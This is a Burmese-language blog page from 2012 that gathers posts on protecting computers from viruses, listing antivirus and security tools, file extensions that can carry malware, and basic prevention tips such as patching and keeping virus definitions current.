Latest Post
Showing posts with label virus. Show all posts
Showing posts with label virus. Show all posts
thumbnail

Virus မ၀င္ေအာင္ ကာကြယ္ျခင္း (ျဖည့္စြက္ခ်က္)

Monday, March 26, 20120 comments

thumbnail

၂၄နာရီ အတြင္း Top 10 Virus မ်ား

0 comments

thumbnail

Dec 12 Virus မ၀င္ေအာင္ ကာကြယ္ျခင္း

0 comments

thumbnail

Dec 22 Virus making Tool မ်ား

0 comments

thumbnail

VIRUS ENGINES

0 comments

thumbnail

computer startup လုပ္တိုင္း restart ျဖစ္ေစတဲ႔ Virus

0 comments

thumbnail

Virus နမူနာမ်ား

0 comments

Test midle sidebar

Labels

Health

Latest News

Powered by Blogger.

iOS

Facebook

Featured Games Today

Ads 468x60px

Pages

Business

Featured Posts Coolbthemes

featured-video

featured-content2

featured-content2

featured-content2

Author Details

My Blog List

featured-content2

Videos

Technology

Pages

Fashion

Decoration

Header Ads

Breaking News

Text Widget

Android

Sample text

Fashion

Labels

Labels

Label

Follow Us @templatesyard

Followers

Social Icons

Showing posts with label virus. Show all posts
Showing posts with label virus. Show all posts

Monday, March 26, 2012

Virus မ၀င္ေအာင္ ကာကြယ္ျခင္း (ျဖည့္စြက္ခ်က္)

Virus မ၀င္ေအာင္ ကာကြယ္ျခင္း ဆိုျပီး post တစ္ခုတင္ခဲ႔ပါတယ္... အဲဒီထဲမွာ လိုအပ္ေနတဲ႔ အခ်က္ေတြကို ျဖည့္စြက္ေပးဖို႔ ျဖည့္စြက္ခ်က္ေတြကို ဆက္တင္ေပးလိုက္ပါတယ္....။

၁။ Antivirus ႏွင့္ Tool မ်ား

Virus မ၀င္ေအာင္ ကာကြယ္ႏို္င္ဖို႔အတြက္ အေရးပါတဲ႔ အခန္းက႑မွာ ပါ၀င္တဲ႔ Antivirus နဲ႔ Tool မ်ားကို ေဖာ္ျပလိုက္တယ္...။

Antivirus------------------------------------------Anti Spyware

BitDefender Antivirus 2010---------------------Spy Sweeper 6.1
Kaspersky Antivirus 2010-----------------------CounterSpy 3
Webroot Antivirus -------------------------------STOPzilla 5.x
Norton Antivirus 2010---------------------------Malwarebytes Anti Malware
ESET Nod32 Antivirus 4--------------------------Spyware Doctor 5.5
AVG Anti-Virus 9----------------------------------SUPER Anti Spyware Pro 4.0
F-Secure Anti-Virus 2010-----------------------Ad-Aware Pro 2010
G DATA AntiVirus 2010--------------------------AntiSpy 5.0
Avira Antivirus Premium------------------------Spyware BeGone 9.15
Trend Micro Antivirus---------------------------CA Anti Spyware
ClamWin Free Antivirus--------------------------a-squared Free 4.5
Avast! Home Edition------------------------------CWShredder 2.19
COMODO Antivirus--------------------------------Trend Micro HijackThis 2.0.3
PC Tools Antivirus---------------------------------Spybot Search and Destroy
Panda Antivirus Pro 2010------------------------Spyware Terminator 2.6.5.111
McAfee VirusScan Plus --------------------------Spyware Blaster 4.2
Quick Heal Antivirus 2010-----------------------Window Defender
ArcaVir Home Protection-----------------------I hate Keyloggers 1.0
BullGuard Internet Security--------------------Ashampoo AntiSpyware
F-PROT Antivirus


Firewalls---------------------------------------------Email Protection

ZoneAlarm Pro 7.0--------------------------------MailWasher
Outpost Firewall Free---------------------------Spamihilator
Norman Personal Firewall----------------------SpamBayes
eConceal Pro 2.0---------------------------------SpamDel
Webroot Desktop Firewall 5.5-----------------Inbox
Injoy Firewall 4------------------------------------GFI Email Security Test
Sygate Personal Firewall------------------------SpamEater Pro
Comodo Firewall----------------------------------CA Anti-Spam
Primedius Firewall Lite------------------------- SPAMifighter
R-Firewall------------------------------------------- ChoiceMail One
Sunblet Personal Firewall----------------------Spam Killer
Sensive Guard--------------------------------------Spam Buster
Ashampoo FireWall-------------------------------Spam Agent
-------------------------------------------------------- iHateSpam


Rootkit Detection & Removal--------------Encryption

Rootkit Revealer-----------------------------------Password Safe
Rootkits Detection & Removal-----------------WinGuard Pro Free
threatfire--------------------------------------------Truecrypt
Panda Anti-Rootkit--------------------------------Crypainer LE
UnHackMe------------------------------- -----------Steganos LockNote
Rootkit Hook Analyzer---------------------------Kruptos 2
---------------------------------------------------=-----Najitool GUI
----------------------------------------------------------Registry Pot
----------------------------------------------------------pcdecrapifier


Cleaning & Tweaking-------------------------Anti-Keylogger

CleanUp! 4.5.2-------------------------------------Privacy Keyboard 9.2.1
Heidi Eraser----------------------------------------Zemana Anti-Logger
DeFraggler------------------------------------------Advanced Anti Keylogger 3.6
Autoruns--------------------------------------------Anti-Keylogger 9.2.1
CCleaner------------------------------------------- Data Guard 2009 Ultimate
O&O Defrag 2000 Freeware-------------------Elite Anti-Keylogger 3.0
Abexo Free Registry Cleaner 1---------------FireLion Anti-Keyloggers 2.0
PC Inspector File Recovery
Process Explorer
Recuva 1.01.069 Beta
Tweak UI
Unlocker 1.8.5
Tiny Watcher
Advanced SystemCare Free
ATF Cleaner 3.0.0.2


၂။ အႏၲရာယ္ရွိႏိုင္ေသာ file extension မ်ား

Virus မ၀င္ေအာင္ ကာကြယ္ျခင္း post ထဲမွာ အႏၲရာယ္ရွိႏိုင္တဲ႔ file extension အနည္းငယ္ကို ေဖာ္ျပခဲ႔ပါတယ္။ အဲဒီထဲမွာ လိုအပ္ခ်က္ရွိေနတဲ႔ file type ေတြကို ဒီမွာ ဆက္လက္ေဖာ္ျပေပးလိုက္ပါတယ္။

.386
Windows Enhanced Mode Driver ျဖစ္ပါတယ္။ device driver ဟာ executable code ျဖစ္တဲ႔အတြက္ virus ကူးစက္ႏိုင္ပါတယ္။ ဒါေၾကာင့္ scan ဖတ္သင့္ပါတယ္။


.ADE
Microsoft Access Project Extension ျဖစ္ပါတယ္။ macro virus ေတြက ၄င္းရဲ႕ အားနည္းခ်က္ေတြကို အသံုးခ်ႏိုင္ပါတယ္။


.ADP
Microsoft Access Project ျဖစ္ပါတယ္။ ဒီ extension ကိုလည္း macros ေတြက အသံုးခ်ႏိုင္ပါတယ္။


.APP
Application File ျဖစ္ပါတယ္။ programအမ်ိဳးမ်ိဳးနဲ႔ ဆက္စပ္ေနတဲ႔ extension ျဖစ္ပါတယ္။ standalone program မ်ားနဲ႔ ဆင္တူေအာင္ျပဳလုပ္ႏိုင္ျပီး database programမ်ားကို တုန္႔ျပန္ႏိုင္ပါတယ္။


.ASP
Active Server Page ျဖစ္ပါတယ္။ programေတြ၊ HTML code ေတြနဲ႔ ေပါင္းစပ္ထားတာျဖစ္ပါတယ္။


.BAS
Microsoft Visual Basic Class Module ျဖစ္ပါတယ္။ ၄င္းတို႔ဟာ programေတြ ျဖစ္ပါတယ္။


.BAT
Batch File ေတြျဖစ္ပါတယ္။ ၄င္းတို႔ဟာ system command ေတြပါ၀င္တဲ႔ text fileေတြ ျဖစ္ၾကပါတယ္။ ၄င္းတို႔ထဲက အခ်ိဳ႕ဟာ batch file virusေတြ ျဖစ္ႏိုင္ပါတယ္ ... ဒါေပမယ့္ အကုန္လံုးေတာ့ မဟုတ္ပါဘူး။


.BIN
Binary File ျဖစ္ပါတယ္။ task အမ်ိဳးအမ်ိဳးအတြက္ သံုးျပဳနိုင္ျပီး အမ်ားအားျဖင့္ program တစ္ခုနဲ႔ ဆက္စပ္ေနတတ္ပါတယ္။ ထပ္လႊမ္းထားတဲ႔ ဖိုင္တစ္ခုနဲ႔ တူျပီး virus ကူးစက္ဖို႔ျဖစ္ႏိုင္ေျခရွိပါတယ္။ ဒါေပမယ့္ အျမဲတမ္းေတာ့ မဟုတ္ပါဘူး။


.BTM
4DOS Batch To Memory Batch File ျဖစ္ပါတယ္။ Virus ပါ၀င္တဲ႔ Batch file ျဖစ္ႏိုင္ပါတယ္။


.CBT
Computer Based Training ပါ။ ၄င္းကို clear ျဖစ္ေအာင္ မလုပ္ႏိုင္ပါဘူး။ ၄င္း ကလည္း virus ကူးစက္ႏိုင္တဲ႔ extension တစ္ခုျဖစ္ပါတယ္။ ဒါေပမယ့္ ၄င္းတို႔ရဲ႕ default list ထဲမွာ Symantec ပါ၀င္ပါတယ္။


.CHM
Compiled HTML Help File ျဖစ္ပါတယ္။ scripေတြနဲ႔ ၄င္းရဲ႕ အားနည္းခ်က္ကို အသံုးခ်ႏိုင္ပါတယ္။


.CLA
.CLASS
Java Class File ျဖစ္ပါတယ္။ sandbox တစ္ခုထဲကေန run ဖို႔အတြက္ suppose လုပ္ႏိုင္တဲ႔ Java applet ေတြျဖစ္ျပီး system ကေနခြဲထုတ္ထားပါတယ္။ sandbox က secure ကိုထည့္သြင္းတြက္ခ်က္ႏိုင္တဲ႔ mode တစ္ခုထဲမွာ run ေနတဲ႔ applet တစ္ခုထဲကို ပရိယာယ္ဆင္ဖို႔အတြက္ user ေတြက ျပဳလုပ္ႏိုင္ပါတယ္။ဒါေၾကာင့္ Class file ေတြကို scanဖတ္သင့္ပါတယ္။


.CMD
Window NT Command Script ျဖစ္ပါတယ္။ NT အတြက္ batch file တစ္ခုျဖစ္ပါတယ္။


.COM
Command(Executable File) ျဖစ္ပါတယ္။ ဘယ္executable file မဆို နည္းလမ္းအမ်ိဳးမ်ိဳးနဲ႔ virus ပါ၀င္ေနႏိုင္ပါတယ္။


.CPL
Control Panel Extension ျဖစ္ပါတယ္။ executable code ေတြပါ၀င္တဲ႔ device driver တစ္ခုနဲ႔ ဆင္တူျပီး virus ပါ၀င္ေနႏိုင္တဲ႔အတြက္ scan ဖတ္သင့္ပါတယ္။


.CRT
Security Certificate ျဖစ္ပါတယ္။ ၄င္းနဲ႔အတူ virus code ေတြ ေပါင္းစပ္ပါ၀င္ႏိုင္ပါတယ္။


.CSC
Corel Script File ျဖစ္ပါတယ္။ executable ျဖစ္တဲ႔ script file ရဲ႕ type တစ္ခုျဖစ္ပါတယ္။ virus scan ဖတ္သင့္ပါတယ္။


.CSS
Hypertext Cascading Style Sheet ျဖစ္ပါတယ္။ Style Sheet ေတြထဲမွာ Virus code ေတြပါ၀င္ႏိုင္ပါတယ္။


.DLL
Dynamic Link Library ျဖစ္ပါတယ္။ လုပ္ငန္းတာ၀န္အမ်ိဳးမ်ိဳးကို လုပ္ေဆာင္ႏိုင္ျပီး program တစ္ခုနဲ႔ ဆက္စပ္ေနတတ္ပါတယ္။အမ်ားအားျဖင့္ေတာ့ DLL ေတြဟာ function ေတြကို programေတြဆီသို႔ ေပါင္းထည့္ေပးတာျဖစ္ပါတယ္။အခ်ိဳ႕ကေတာ့ executable code ေတြပါ၀င္ေနျပီး မ်ားေသာအားျဖင့္ functionေတြ (သို႔) data ေတြ ရိုးရိုးရွင္းရွင္းပဲ ပါ၀င္ပါတယ္။ ဒါေပမယ့္ virus ပါ မပါဆိုတာကို မသိႏိုင္တဲ႔အတြက္ scan ဖတ္သင့္ပါတယ္။


.DOC
MS Word Document ျဖစ္ပါတယ္။ Word document ေတြထဲမွာ macro virusေတြပါ၀င္ေနႏိုင္ျပီး virus ေတြနဲ႔ wormေတြအတြက္ အျပည့္အ၀ အသံုးခ်ႏိုင္ပါတယ္။


.DOT
MS Word Document Template ျဖစ္ပါတယ္။ Word Tamplateေတြထဲမွာလည္း macro virus ေတြ ပါ၀င္ႏိုင္ျပီး virus နဲ႔ worm ေတြအတြက္ အျပည့္အ၀ အသံုးခ်ႏိုင္ပါတယ္။


.DRV
Device Driver ျဖစ္ပါတယ္။ device driver တစ္ခုဟာ executable code ျဖစ္ပါတယ္။ဒါေၾကာင့္ virus ပါ၀င္ေနႏိုင္ျပီး scan ဖတ္သင့္ပါတယ္။


.EML
.EMAIL
MS Outlook Express E-mail ျဖစ္ပါတယ္။ E-mail message ေတြမွာ HTML နဲ႔ script ေတြပါ၀င္ႏိုင္ပါတယ္။ virus နဲ႔ worms အမ်ားစုက ဒီအားနည္းခ်က္ကို အသံုးခ်ၾကပါတယ္။


.EXE
Executable File ျဖစ္ပါတယ္။ ဘယ္executable file မဆို နည္းလမ္းအမ်ိဳးမ်ိဳးနဲ႔ virus ေတြပါ၀င္ႏိုင္ပါတယ္။


.FON
Font ျဖစ္ပါတယ္။ ယံုလို႔လည္း ရတယ္ မယံုလို႔လည္း ရတဲ႔ extension တစ္ခုျဖစ္ပါတယ္။ font file တစ္ခုထဲမွာ executable code ေတြရွိေနႏိုင္တဲ႔အတြက္ virus ပါ၀င္ႏိုင္ပါတယ္။


.HLP
Help File ျဖစ္ပါတယ္။ Help File ေတြထဲမွာ macro virus ေတြပါ၀င္ႏိုင္ပါတယ္။ ၄င္းတို႔က အမ်ားအားျဖင့္ေတာ့ virus မပါ ပါဘူး။ ဒါေပမယ့္ Trojan တစ္ခု၊ ႏွစ္ခုေတာ့ ထည့္ထားႏိုင္ပါတယ္။


.HTA
HTML Program ပါ။ scriptေတြ ပါ၀င္ႏိုင္ပါတယ္။


.HTM
.HTML
Hypertext Markeup Language ျဖစ္ပါတယ္။ HTML file ေတြဟာ ပိုပိုျပီး virus သယ္ေဆာင္တဲ႔ script ေတြ ပါ၀င္ႏိုင္ပါျပီ။


.INF
Setup Information ပါ။ Setup scriptေတြဟာ ေမွ်ာ္လင့္မထားတဲ႔ အရာေတြကို ျပဳလုပ္ဖို႔အတြက္ ေျပာင္းလဲႏိုင္ၾကပါတယ္။

.INI
Initialization File ျဖစ္ပါတယ္။ program option ေတြပါ၀င္ ပါတယ္။


.INS
Internet Naming Service ျဖစ္ပါတယ္။ ေမွ်ာ္လင့္မထားတဲ႔ ေနရာကို ညႊန္းျပေပးဖို႔ ေျပာင္းလဲႏိုင္ၾကပါတယ္။


.ISP
Internet Communication Setting ေတြျဖစ္ပါတယ္။ ေမွ်ာ္လင့္မထားတဲ႔ အရာေတြကို ညႊန္ျပဖို႔အတြက္ ေျပာင္းလဲႏိုင္ၾကပါတယ္။


.JS
.JSE
JavaScript ျဖစ္ပါတယ္။ script fileေတြဟာ virus ပါ၀င္တဲ႔ file ေတြျဖစ္လာၾကပါျပီ။ ဒါေၾကာင့္ အေကာင္းဆံုးကေတာ့ ၄င္းတို႔ကို scan ဖတ္သင့္ပါတယ္။ (.JSE ဟာ encode ျဖစ္ပါတယ္။ ဒါေၾကာင့္ တစ္ခုမွတ္ထားရမွာက ၄င္းတို႔ဟာ အျခားအရာေတြ၊ Random၊ Extensionေတြ ပါ၀င္ေနႏိုင္တယ္ ဆိုတာပါပဲ။)


.LIB
Library ျဖစ္ပါတယ္။ သီအိုရီအရေတာ့ ၄င္း file ေတြဟာလည္း virus ပါ၀င္ႏိုင္ပါတယ္။ ဒါေပမယ့္ အခုထိေတာ့ LIB-File virus ေတြကို ေဖာ္ျပေပးႏိုင္ျခင္း မရွိေသးပါဘူး။


.LNK
Link ျဖစ္ပါတယ္။ ေမွ်ာ္လင့္မထားတဲ႔ ေနရာေတြကို ညႊန္ျပဖို႔အတြက္ ေျပာင္းလဲႏိုင္ပါတယ္။


.MDB
MS Access Database (သို႔) MS Access Application ျဖစ္ပါတယ္။ Access fileေတြမွာ macro virusေတြ ပါ၀င္ေနႏိုင္ျပီး virus ေတြ၊ wormေတြက ၄င္းကို အျပည့္အ၀ အသံုးခ်ႏိုင္ၾကပါတယ္။


.MDE
Microsoft Access MDE database ျဖစ္ပါတယ္။ macro ေတြ၊ scriptေတြက ၄င္းရဲ႕ အားနည္းခ်က္ကို အသံုးခ်ႏိုင္ပါတယ္။


.MHT
.MHTM
.MHTML
MHTML Document ျဖစ္ပါတယ္။ ၄င္းတို႔က Web page ကိုသိမ္းဆည့္တဲ႔ဟာ ျဖစ္ပါတယ္။ ၄င္းတို႔မွာ scriptေတြပါ၀င္ႏိုင္ျပီး virus ကူးစက္ႏိုင္ပါတယ္။


.MP3
MP3 Program ျဖစ္ပါတယ္။အမွန္တကယ္ music file ေတြက virus မကူးစက္ႏိုင္ပါဘူး...ဒါေပမယ့္ .mp3 extensionေတြနဲ႔ အတူပါတဲ႔ fileေတြမွာ Windows (သို႔) RealNetwork media playerေတြက အဓိပၸာယ္ေကာက္ယူျပီး run ႏိုင္တဲ႔ macro code ေတြပါ၀င္ေနႏိုင္ပါတယ္။ ဒါေၾကာင့္ အမွန္တကယ္ music file ရဲ႕ အလြန္မွာ က်ယ္ျပန္႔မႈေတြရွိပါတယ္။


.MSO
Math Script Object ျဖစ္ပါတယ္။ Symantec အရေတာ့ ၄င္းတို႔ဟာ database-related program file ေတြျဖစ္ပါတယ္။


.MSC
Microsoft Common Console Document ေတြျဖစ္ပါတယ္။ ေမွ်ာ္လင့္မထားတဲ႔ ေနရာကို ညႊန္ျပေပးဖို႔အတြက္ ေျပာင္းလဲေပးႏိုင္ၾကပါတယ္။


.MSI
Microsoft Windows Installer Package ျဖစ္ပါတယ္။ Virus code ေတြ ပါ၀င္ႏိုင္ပါတယ္။


.MSP
Microsoft Windows Installer Patch ျဖစ္ျပီး virus code ေတြပါ၀င္ႏိုင္ပါတယ္။


.MST
Microsoft Visual Test Source File ျဖစ္ပါတယ္။ Source ေတြေျပာင္းလဲႏိုင္ပါတယ္။


.OBJ
Relocatable Object Code ျဖစ္ပါတယ္။ ၄င္း fileေတြဟာ programေတြနဲ႔ ဆက္စပ္ေနပါတယ္။


.OCX
Object Linking နဲ႔ Embedding (OLE) Control Extension ျဖစ္ပါတယ္။Web page တစ္ခုကေန download ျပဳလုပ္ႏိုင္တဲ႔ program တစ္ခုျဖစ္ပါတယ္။


.OV?
Program File Overlay ျဖစ္ပါတယ္။ progarm တစ္ခုနဲ႔အတူ လုပ္ငန္းတာ၀န္အမ်ိဳးမ်ိဳးကို ျပဳလုပ္ဖို႔အသံုးျပဳႏိုင္ပါတယ္။ ေယဘူယ်အားျဖင့္ေတာ့ Overlayေတြဟာ functionေတြကို programေတြဆီသို႔ ေပါင္းထည့္ေပးဖို႔ျဖစ္ပါတယ္။Overlay fileေတြမွာ virus ပါ၀င္ေနႏိုင္ပါတယ္။ ဒါေပမယ့္အမ်ားအားျဖင့္ေတာ့ မပါ ပါဘူး။


.PCD
Photo CD MS Compiled Script ျဖစ္ပါတယ္။ Scriptေတြဟာ အားနည္းခ်က္ေတြျဖစ္ပါတယ္။


.PGM
Program File ျဖစ္ပါတယ္။ program အမ်ိဳးအမ်ိဳးနဲ႔ ဆက္စပ္ေနပါတယ္။ standalone program မ်ားနဲ႔ ဆင္တူေအာင္ျပဳလုပ္ႏိုင္ျပီး database programမ်ားကို တုန္႔ျပန္ႏိုင္ပါတယ္။


.PIF
MS-DOS Shortcut ျဖစ္ပါတယ္။ ၄င္းကို ေျပာင္းလဲလိုက္မယ္ဆိုရင္ေတာ့ ေမွ်ာ္လင့္မထားတဲ႔ programေတြ အျဖစ္ run ႏိုင္ပါတယ္။


.PPT
MS PowerPoint Presentation ျဖစ္ပါတယ္။ ၄င္းထဲမွာ macro virus ေတြပါ၀င္ေနႏိုင္ျပီး virus ေတြ၊ warmေတြက ၄င္းကို အျပည့္အ၀ အသံုးခ်ႏိုင္ၾကပါတယ္။


.PRC
Palmpilot Resource File ျဖစ္ပါတယ္။ PDA program တစ္ခုျဖစ္ျပီး ရွားရွားပါ PDA virus ေတြရွိေနႏိုင္ပါတယ္။

.REG
Registry Entryေတြျဖစ္ျပီး ၄င္းကို runလိုက္မယ္ဆိုရင္ Registry ကို ေျပာင္းလဲႏိုင္ပါတယ္။


.RTF
Rich Text Format ျဖစ္ပါတယ္။ text ေတြကို formatျပဳလုပ္ ေရႊ႕႕ေျပာင္းေပးဖို႔အတြက္ format တစ္ခုျဖစ္ျပီး အမ်ားအားျဖင့္ေတာ့ ယံုၾကည္ႏိုင္ပါတယ္။ virus ပါ၀င္တဲ႔ Binary object ေတြဟာ RTF file ေတြၾကားထဲမွာ နစ္ျမဳပ္ေနႏိုင္ပါတယ္။ ဒါေၾကာင့္ လံုျခံဳစိတ္ခ်ရဖို႔အတြက္ scan ဖတ္သင့္တဲ႔အထဲမွာ ပါ ပါတယ္။RTF ဖိုင္ေတြဟာ DOC file ေတြကို rename ေပးႏိုင္ျပီး Word က ၄င္းတို႔ကို DOC fileေတြကဲ႔သို႔ ဖြင့္ပါတယ္။


.SCR
Screen Saver (သို႔) Script ျဖစ္ပါတယ္။ Screen Saverေတြနဲ႔ Scriptေတြ ႏွစ္ခုစလံုးက executable code ေတြျဖစ္ပါတယ္။ ဒါေၾကာင့္ virus ေတြပါ၀င္ေနႏိုင္သလို warm (သို႔) Trojan ေတြထည့္ထားႏိုင္ပါတယ္။


.SCT
Windows Script Component ျဖစ္ပါတယ္။ Scriptေတြဟာ virus ကူးစက္ႏိုင္ပါတယ္။


.SHB
.SHS
Shell Scrap Object File ျဖစ္ပါတယ္။ scrap file တစ္ခုမွာ ရိုးစင္းတဲ႔ text file ကေန စြမ္းအားျပည့္၀တဲ႔ executable file ေတြအထိပါ၀င္ႏိုင္ပါတယ္။တျခားတစ္ေယာက္ကေနသင့္ဆီကို ေပးပို႔ခဲ့မယ္ဆိုရင္ အမ်ားအားျဖင့္ေတာ့ ၄င္းတို႔ကို ေရွာင္ရွားသင့္ပါတယ္။ ဒါေပမယ့္ ပံုမွန္အားျဖင့္ေတာ့ single systemေတြေပၚမွာ operation system အားျဖင့္ အသံုးျပဳၾကပါတယ္။


.SMM
Ami Pro Macro Rare ျဖစ္ျပီး virus ကူးစက္ႏိုင္ပါတယ္။


Source
Source Code ေတြျဖစ္ပါတယ္။ program file ေတြရွိၾကျပီး source code virus အားျဖင့္ virus ကူးစက္ႏိုင္ပါတယ္။(ဒီလိုကူးစက္တယ္ဆိုတာ ရွားေတာ့ ရွားပါတယ္။) သင္ဟာ programmer တစ္ေယာက္ မဟုတ္ခဲ႔ဘူးဆိုရင္ေတာင္မွ စိုးရိမ္စရာေတာ့ မလိုပါဘူး။ Extensionေတြပါ၀င္ျပီး .ASM, .C , .CPP, .PAS, .BAS, .FOR ပဲျဖစ္ရမယ္လို႔ေတာ့ ကန္႔သတ္ခ်က္မရွိပါဘူး။


.SYS
System Device Driver ျဖစ္ပါတယ္။ device driver ဟာ executable code ျဖစ္တဲ႔အတြက္ virus ကူးစက္ႏိုင္ပါတယ္...ဒါေၾကာင့္ scan ဖတ္သင့္ပါတယ္။


.URL
Internet Shortcut ျဖစ္ပါတယ္။မလိုလားအပ္တဲ႔ Web location ေတြဆီသို႔ သင့္ကို ပို႔ေဆာင္ေပးႏိုင္ပါတယ္။


.VB
.VBE
VBScript File ျဖစ္ပါတယ္။ ဒီ Scriptေတြဟာ virus ကူးစက္ႏိုင္ပါတယ္။(.VBE ဟာ encode ျဖစ္ပါတယ္။)

.VBS
Visual Basic Script ျဖစ္ပါတယ္။ ဒီ script file ေတြမွာ virus ပါ၀င္ႏိုင္သလို warm (သို႔) Trojan တစ္ခုကိုလည္း ထည့္ထားႏိုင္ပါတယ္။


.VXD
Virtual Device Driver ျဖစ္ပါတယ္။ executable code ေတြျဖစ္တဲ႔အတြက္ virus ကူးစက္ႏိုင္ပါတယ္...scan ဖတ္ပါ။


.WSC
Windows Script Component ျဖစ္ပါတယ္။ Scriptေတြဟာ virus ကူးစက္ႏိုင္ပါတယ္။


.WSF
Windows Script File ျဖစ္ျပီး virus ကူးစက္ႏိုင္ပါတယ္။


.WSH
Windows Script Host Settings File ျဖစ္ပါတယ္။ Settingေတြဟာ ေမွ်ာ္လင့္မထားတာေတြကို ျပဳလုပ္ဖို႔အတြက္ ေျပာင္းလဲႏိုင္ၾကပါတယ္။


.XL?
MS Excel File ျဖစ္ပါတယ္။ Excel Worksheet ေတြမွာ macro virus ေတြပါ၀င္ေနႏိုင္ျပီး virus နဲ႔ wormေတြက ၄င္းတို႔ကို အျပည့္အ၀အသံုးျပဳႏိုင္ၾကပါတယ္။


ဒီေလာက္ဆိုရင္ေတာ့ file type ေတြအေၾကာင္းကို သိၾကလိမ့္မယ္လို႔ ယူဆရပါတယ္။ေနာင္ကိုလည္း ျဖည့္စြက္ခ်က္ေတြ ထပ္တင္ေပးပါ့မယ္။

၂၄နာရီ အတြင္း Top 10 Virus မ်ား

ဒါကေတာ့ ၾကိဳတင္ကာကြယ္ႏိုင္ဖို႔အတြက္ အခုေနာက္ဆံုး ၂၄ အတြင္းမွာ ေရပန္းစားေနတဲ႔ ေနာက္ဆံုးေပၚ Top 10 Virus မ်ားျဖစ္ပါတယ္...
The latest alerts - ဒီ Virus ေတြနဲ႔ Trojan ေတြကေတာ့ အခု သင္သံုးေနတဲ႔ current anti-virus softwareကေန delete မလုပ္ႏိုင္ေသးပါဘူး...( ဒါေၾကာင့္ anti-virus ေတြကို update လုပ္ထားဖို႔လိုပါတယ္။ တစ္ခုခ်င္းစီေပၚမွာ Click ၾကည့္ျခင္းအားျဖင့္ အေသးစိတ္အခ်က္အလက္မ်ားကို သိႏိုင္ပါတယ္)


ေအာက္မွာျပထားတဲ႔ Virus ေတြကေတာ့ ယခင္လအတြင္းမွာ ထိပ္ဆံုးေရာက္ေနတဲ႔ top 10 most common viruses ေတြပါ။ ဒီ Virus ေတြကိုလည္း သင္လက္ရွိသံုးေနတဲ႔ Anti-virus software ကေန detect လုပ္ႏိုင္ဖို႔မေသခ်ာေသးပါဘူး...


Virus hoax ေတြကေတာ့ စိတ္အေႏွာင့္အယွက္ျဖစ္ေစတဲ႔ Email "warnings" ေတြျဖစ္ျပီး ၄င္းတို႔က သင့္ရဲ႕ သူငယ္ခ်င္းမ်ားအားလံုးဆီကုိ အဓိပၸာယ္မရွိတဲ႔ေမးလ္ေတြပို႔ေစျပီး သူတို႔ email box ထဲမွာ ဘာမွအသံုးမ၀င္တဲ႔ Email ေပါင္းေျမာက္ျမားစြာနဲ႔ ျပည့္ႏွက္သြားေစပါတယ္


အခ်ိန္မွီကာကြယ္ႏိုင္ဖို႔အတြက္ ျပင္ဆင္ထားႏိုင္ေအာင္ ျဖစ္ပါတယ္...( ေနာက္ဆံုးသတင္းမ်ားကို အခ်ိန္မွီ update လုပ္ေပးသြားပါမယ္...)

Dec 12 Virus မ၀င္ေအာင္ ကာကြယ္ျခင္း

Virus ဖန္တီးျခင္းေတြပဲတင္ျဖစ္ခဲ႔တာမ်ားပါတယ္။ Virus ကာကြယ္ျခင္းအပိုင္းကိုေတာ့ အခုမွပဲ တင္ျဖစ္ေတာ့တယ္။ ဒီ Post မွာေတာ့ Virus ဆိုတဲ႔ ေခါင္းစဥ္ေအာက္မွာ Trojans, Worms , Searchbars , Spyware နဲ႔ အျခား Malware ပါ၀င္တယ္လို႔ မွတ္ယူရပါလိမ့္မယ္... Virus ရန္ကေန ကာကြယ္ခ်င္တယ္ ဆိုရင္ေတာ့ အခုေဖာ္ျပမယ့္ အခ်က္ေလးေတြကို အထူးသတိထား ဖို႔ေတာ့ လိုပါတယ္....

(၁) Security Patch မ်ားကို Install လုပ္ပါ။

သင့္ရဲ႕ Operating System အတြက္ available ျဖစ္ေနတဲ႔ security patch အားလံုးကို ရယူဖို႔နဲ႔ install လုပ္ထားဖုိ႔လိုပါတယ္... အကယ္၍ Windows 98 နဲ႔ ေနာက္ပိုင္း Windows ေတြမွာ MSIE နဲ႔ Windows Update ေတြအတြက္ လိုအပ္တဲ႔ Patch ေတြကို Provide ေပးေပမယ့္ Windows 95 နဲ႔ အလားတူ system ေတြအတြက္ ကေတာ့ WindizUpdate ကို အသံုးျပဳသင့္ပါတယ္...
အေရးအၾကီးဆံုးကေတာ့ အပတ္စဥ္ updates ေတြကို စစ္ေဆးေပးဖို႔နဲ႔ သင့္ရဲ႕ Operation System အတြက္ေတြ႔ရွိထားတဲ႔ အားနည္းခ်က္မ်ားနဲ႔ ပတ္သတ္တဲ႔ ေနာက္ဆံုးသတင္းအခ်က္အလက္ေတြကို ရရွိဖို႔ မ်က္စိဖြင့္ နားစြင့္ ထားရမွာ ျဖစ္ပါတယ္ ။

(၂) Antivirus Software နဲ႔ Adware Removal Tools ေတြအေပၚမွာပဲ အားကိုး အားထားမျပဳပါနဲ႔

Virus ေတြကို ကာကြယ္ဖုိ႔အတြက္ Antivirus Software ေတြ Tools ေတြကို သံုးတာဟာ ေကာင္းတဲ႔ သင့္ Computer ကိုကာကြယ္ဖုိ႔အတြက္ ေကာင္းေသာ အေလ့အက်င့္တခုပါ... ဒါေပမယ့္ အဲဒီ Software ေတြ Tools ေတြအေပၚမွာပဲ အားကိုးမေနသင့္ပါဘူး... Training နဲ႔ Virus Awareness ရွိေနဖို႔က ပိုအေရးၾကီးတာျဖစ္ပါတယ္...
သိၾကတဲ႔အတိုင္းပဲ လူအမ်ားစုက ကိုယ့္ Computer မွာ Antivirus Software ကို run ထားတယ္ဆိုရင္ Antivirus က ကာကြယ္ေပးလိမ့္မယ္ ဆိုျပီး သတိမမူေတာ့ပဲ စိတ္ခ်လက္ခ်ေနတတ္ၾကပါတယ္... အဲဒါဟာ မွားတယ္ဆိုတာကို ေအာက္ပါ အခ်က္ေတြကို ၾကည့္ျခင္းအားျဖင့္ သိပါလိမ့္မယ္....
  • အကယ္၍ သင့္ Antivirus ရဲ႕ virus definition ေတြဟာ ရက္သတၱပတ္ ၂ ပတ္ေက်ာ္သြားျပီး ဆိုရင္ သင့္ရဲ႕ Virus Scanner ဟာ အသံုးမ၀င္ေတာ့ပါဘူး... ဘာေၾကာင့္လဲဆိုေတာ့ အသစ္ထြက္တဲ႔ Virus ေတြကို detected မျဖစ္ပဲ ၀င္ခြင့္ျပဳေနေသးလို႔ျဖစ္ပါတယ္...သင့္ရဲ႕ ဖိုင္ေတြကို remove လုပ္ဖုိ႔၊ exit လုပ္ဖို႔နဲ႔ emails အေျမာက္အျမားပို႔ဖို႔ အတြက္ အလားအလာေတြ ရွိေနပါေသးတယ္... free antivirus program ေတြမွာဆိုရင္ အမ်ားအားျဖင့္ တစ္လ တခါပဲ update ေပးပါတယ္... အဲလိုမ်ိဳး software ေတြကို ဘယ္ေတာ့မွ မသံုးမျပဳသင့္ပါဘူ...
